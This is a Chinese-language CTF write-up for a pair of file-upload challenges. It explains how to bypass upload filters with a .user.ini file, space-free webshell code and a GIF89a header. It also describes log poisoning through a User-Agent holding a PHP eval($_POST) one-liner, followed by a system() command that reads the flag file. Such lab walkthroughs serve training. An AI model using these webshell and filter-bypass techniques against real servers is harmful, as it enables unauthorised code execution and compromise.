这道题跟前几题差不多增加了一个对 空格的限制所以我们在写木马文件的时候只需要注意不要加上空格就好这道题我们还是先上传user.ini文件然后上传我们编写的木马文件记得检查有没有空格如果不确定自己的木马文件是否能上传成功就可以先发到repeater重放器里面如果resopnse中最后一行的结果类似与{“code”:0,“msg”:“upload/MM.png”}说明上传成功此时我们就可以访问upload目录然后在打开一个原来题目的网址写入一个1.txt并给它加上一个user-agent内容为?php eval($_POST[1]);?写好后点击execute运行使其写入该网站的日志文件中接下来回到upload目录下开启POSTmethod进行命令执行payload为1system(‘tac …/flag.php’);执行后在当前页面就可以看到flag了161对文件的内容进行进一步限制需要在前面限制条件的基础上再加上一个图片的头文件我们要在user.ini文件和木马文件前加上一个GIF89a来绕过限制因为GIF89a是一种图像文件格式的标准所以可以在检验上传文件内容的时候绕过限制使我们的攻击代码能够上传成功